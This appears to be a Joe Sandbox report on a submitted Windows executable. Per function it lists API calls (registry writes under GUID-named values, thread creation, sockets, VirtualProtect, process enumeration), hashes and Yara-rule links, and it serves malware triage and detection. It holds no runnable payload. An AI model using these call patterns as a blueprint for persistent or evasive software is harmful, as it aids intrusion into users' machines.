                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1560999653-1105423733
                                                                            • Opcode ID: 92a44ad34f10796bd761c3fb333e1ad406df70590571cc3fadc5aa820665e1ea
                                                                            • Instruction ID: 9a1b950ceb8f74ad94c50f2947eb4bd93f31aaa3660083f696fbc6a9d389f10b
                                                                            • Opcode Fuzzy Hash: 92a44ad34f10796bd761c3fb333e1ad406df70590571cc3fadc5aa820665e1ea
                                                                            • Instruction Fuzzy Hash: 98217F31901390DBCF38ABA4E96DF6D7BB8B7D1316F20191DF901A2160CB7E9995CB11
                                                                            Function 007D0010 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                            • wnsprintfW.SHLWAPI ref: 007D005F
                                                                            • lstrlenW.KERNEL32(?), ref: 007D0070
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D008E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 1665550476-4073750446
                                                                            • Opcode ID: 8599fc334abc58fb5dd47b3fb2c94af31518b4cd199ff9e6d1890bef1c3695b5
                                                                            • Instruction ID: daa36a3c19c2172e3c39ba5e9409cfc7c9159ec3af4b6691df99f1b47c8caa7c
                                                                            • Opcode Fuzzy Hash: 8599fc334abc58fb5dd47b3fb2c94af31518b4cd199ff9e6d1890bef1c3695b5
                                                                            • Instruction Fuzzy Hash: B7012D74A00208FBDB14DFA4DC4ABAEBBB9EB44701F108465FA05E6280D6789A41CBA4
                                                                            Function 007C4770 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007C478F
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C47A7
                                                                            • RegSetValueExW.ADVAPI32(?,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000000,00000003,?,?), ref: 007C47CA
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C47D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 2100281157-3800169908
                                                                            • Opcode ID: 3a1f86d9474d83b3e543c37c390807a112eb2264c025a1fb1711f95864d6e53b
                                                                            • Instruction ID: 42289d288585e806e0345cb78000611abb84ed5ff04802c1e8ba1375fa65ae4e
                                                                            • Opcode Fuzzy Hash: 3a1f86d9474d83b3e543c37c390807a112eb2264c025a1fb1711f95864d6e53b
                                                                            • Instruction Fuzzy Hash: 11016779604208FBD714DBB4DC99FAA7368FB48700F10495CBA05D6180E679DA0097A0
                                                                            Function 007C9E40 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007C9E57
                                                                            • __snwprintf.LIBCMT ref: 007C9E7C
                                                                            • RegGetValueW.ADVAPI32(80000001,?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000002,00000000,00000000,00000208), ref: 007C9EA8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9EC7
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007C9E66
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007C9E97
                                                                            • SOFTWARE\%s, xrefs: 007C9E6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFreeValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3906065898-923683513
                                                                            • Opcode ID: e4fb720acc45f26297d60d4a2f65fb21672ef3c397cadcb88a92ab034063a73c
                                                                            • Instruction ID: e043fe1eee88c6e1866da1b7f64b518c5d2ed1e59dd630e64b6b668af8016bae
                                                                            • Opcode Fuzzy Hash: e4fb720acc45f26297d60d4a2f65fb21672ef3c397cadcb88a92ab034063a73c
                                                                            • Instruction Fuzzy Hash: 29017171A44208FBEB10DBA4DD4EFAEB7B4FB58700F104998B604E7281D6B45B409B90
                                                                            Function 007DE820 Relevance: 10.7, APIs: 7, Instructions: 200memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DE862
                                                                            • und_memcpy.LIBCMTD ref: 007DE888
                                                                            • und_memcpy.LIBCMTD ref: 007DE8A3
                                                                            • und_memcpy.LIBCMTD ref: 007DE8D7
                                                                            • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 007DEAE5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DEBAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 3065580769-0
                                                                            • Opcode ID: 8a64a8bd4ec99043d1064bdf4de021af2f293a3e42271a9b681c80310f060139
                                                                            • Instruction ID: 51ad7eb8a2b1a00bd436f0f1bc974935258dcc71cd7257ef75d4c457ab17031a
                                                                            • Opcode Fuzzy Hash: 8a64a8bd4ec99043d1064bdf4de021af2f293a3e42271a9b681c80310f060139
                                                                            • Instruction Fuzzy Hash: E5A1C270A01129CBDB69DF04CD85BEAB7B1BB98305F1481DAD44DAB354D739AE81CF80
                                                                            Function 007C7260 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C72DB
                                                                            • _memset.LIBCMT ref: 007C732B
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C7595
                                                                            • closesocket.WS2_32(?), ref: 007C759F
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crt_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: $#
                                                                            • API String ID: 2801799075-2491617062
                                                                            • Opcode ID: f5f824da3953bfa382c1cbfc1d7b47cd430aa88c4c87e0cb949d9c788cb5930e
                                                                            • Instruction ID: 5d628541e117bb2cd87dd054e84387c72ef7331f95acc9c1d0f47578d2eb92cc
                                                                            • Opcode Fuzzy Hash: f5f824da3953bfa382c1cbfc1d7b47cd430aa88c4c87e0cb949d9c788cb5930e
                                                                            • Instruction Fuzzy Hash: CF811AB090421DDFEB24DF50D949BEEBBB5FB44304F2082D9D5486B281D7BA5A88CF51
                                                                            Function 007C90B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: b65852fbe9d54750713c1503c70ce0a7a21f1c5f6e4f8ef19c295bcfc4db13f9
                                                                            • Instruction ID: 2a6a90f9630ad0a99c7db4323816f6992395b7328754a1ecb6c125ee3260af1a
                                                                            • Opcode Fuzzy Hash: b65852fbe9d54750713c1503c70ce0a7a21f1c5f6e4f8ef19c295bcfc4db13f9
                                                                            • Instruction Fuzzy Hash: F8518171A00619EBEB18DF84C99EFAEB776FB90304F14426CD1166F681C739EA41CB41
                                                                            Function 007C68B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C6932
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C696A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C6987
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C69D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 2857295742-2564639436
                                                                            • Opcode ID: 4070b5fb879864a3c6c343a0292bb697a6005300dc2195d5f0f942cf2fddb6c8
                                                                            • Instruction ID: a0d6dd7e9274af8af0e716655ec2a942ecbbff62d8221c620a146e845e45dde5
                                                                            • Opcode Fuzzy Hash: 4070b5fb879864a3c6c343a0292bb697a6005300dc2195d5f0f942cf2fddb6c8
                                                                            • Instruction Fuzzy Hash: 34515071A00A14EBEB18DF84CADAB6DB776FBD0309F1482ADD0166F691C7399A41DF40
                                                                            Function 007C2754 Relevance: 10.6, APIs: 7, Instructions: 92stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcmpiW.KERNEL32(?,-00832F28,00000000,?,?,?,?,?), ref: 007C278C
                                                                            • _memset.LIBCMT ref: 007C27B1
                                                                            • lstrcpyW.KERNEL32(?,-00832F28,?,?,?,?,?,?,?), ref: 007C27CF
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C2815
                                                                              • Part of subcall function 007C2A80: construct.LIBCPMTD ref: 007C2B09
                                                                            • StrCatW.SHLWAPI(00000000,007F2714), ref: 007C2863
                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 007C2874
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C28D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C28E8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C28F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$CloseFreeHandleLocalNextProcess32_memset_wcsrchrconstructlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3449763073-0
                                                                            • Opcode ID: 8f46c1afa44775dd38816e99fcb9774df18b28d97ba747684e6a488afa915269
                                                                            • Instruction ID: e3d72badf7a05c3d48163bb8790d670a78204ac0ac95b2a5dff49fd5a7a100c0
                                                                            • Opcode Fuzzy Hash: 8f46c1afa44775dd38816e99fcb9774df18b28d97ba747684e6a488afa915269
                                                                            • Instruction Fuzzy Hash: FE412C72D04218DBDB24DB64DC88FDDB7B5BF98300F00859CE50AB6251EB799A85CF54
                                                                            Function 007D7236 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D7287
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D72A7
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D72BF
                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 007D72DE
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D730C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D7361
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D738D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D73AD
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D73C5
                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 007D73E4
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D7412
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 738346648-2564639436
                                                                            • Opcode ID: 23bfbcaab8414962cfeb4dcb9a5e8aa4019a76a326f1f40112e4f9a26fe66591
                                                                            • Instruction ID: 873c4d394bab26dc0bf5f759b6a4c3ce6cd1a65fdc8dd66f6fbeb0a931d7e698
                                                                            • Opcode Fuzzy Hash: 23bfbcaab8414962cfeb4dcb9a5e8aa4019a76a326f1f40112e4f9a26fe66591
                                                                            • Instruction Fuzzy Hash: 0531C674E04248DFDB18CF94C888B9CFBB1BF48315F24C219E9156B395D778A886CB44
                                                                            Function 007DC770 Relevance: 10.6, APIs: 7, Instructions: 74threadmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007DC786
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 007DC7A9
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DC7C0
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007DC7FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC812
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC82C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC836
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
                                                                            • String ID:
                                                                            • API String ID: 4097846125-0
                                                                            • Opcode ID: ac41cb95e7a5fc8b2f73a3e7c49a81991ba509475a595c33fb85da7b2f7caf26
                                                                            • Instruction ID: 70cde24a1fd8b24cfba68e6fefc4e555de8ffd9821dca2e2265912a77112e28c
                                                                            • Opcode Fuzzy Hash: ac41cb95e7a5fc8b2f73a3e7c49a81991ba509475a595c33fb85da7b2f7caf26
                                                                            • Instruction Fuzzy Hash: 6D213B79E00208FFDB04DFA4DC49F9DBBB5AB48301F208559FA09AB391D778AA41DB54
                                                                            Function 007CA0F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CA113
                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 007CA148
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007CA158
                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 007CA189
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA1A4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalValue$AllocFree__snwprintf
                                                                            • String ID: SOFTWARE\%s
                                                                            • API String ID: 297434584-297323700
                                                                            • Opcode ID: 576d250d501a9a7efb7af515da6b404f1d2cbadaf4f9e8a48df79d69f47af4c7
                                                                            • Instruction ID: f25bc20bcd34d336078f178333630b84797d01d17d416b99257a280735bf4bb1
                                                                            • Opcode Fuzzy Hash: 576d250d501a9a7efb7af515da6b404f1d2cbadaf4f9e8a48df79d69f47af4c7
                                                                            • Instruction Fuzzy Hash: 3F21127560020CFFEB14CF94CC49FAEB7B8FB84705F14855CBA05AB280D675AE449B95
                                                                            Function 007DF080 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007DF09C
                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007DF0B1
                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 007DF0C6
                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 007DF0E7
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007DF0FD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF114
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007DF11E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
